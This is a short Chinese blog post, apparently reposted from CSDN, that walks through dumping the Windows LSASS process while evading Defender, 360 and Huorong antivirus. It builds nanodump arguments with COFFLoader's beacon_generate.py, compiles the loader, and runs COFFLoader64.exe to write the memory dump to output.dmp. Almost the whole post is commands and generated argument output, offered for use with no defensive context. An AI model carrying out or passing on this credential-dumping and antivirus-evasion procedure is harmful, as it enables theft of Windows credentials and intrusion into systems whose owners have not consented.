绕过Defender/360/火绒导出Lsass进程

2023-12-13 09:22:03

项目地址:

https://github.com/trustedsec/COFFLoader

python3 beacon_generate.py
python3 beacon_generate.py   Beacon Argument GeneratorBeacon>addint lsass进程IDBeacon>addString output.dmpBeacon>addint 1Beacon>addint 1Beacon>addint 0Beacon>addint 1Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>generateb'59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'Beacon>

编译文件

cd COFF-master
make

落地执行:

xxxxxxxxxx COFFLoader64.exe go nanodump.x64.o 59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000

defender:
在这里插入图片描述

文章来源:https://blog.csdn.net/weixin_65550121/article/details/134790132
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。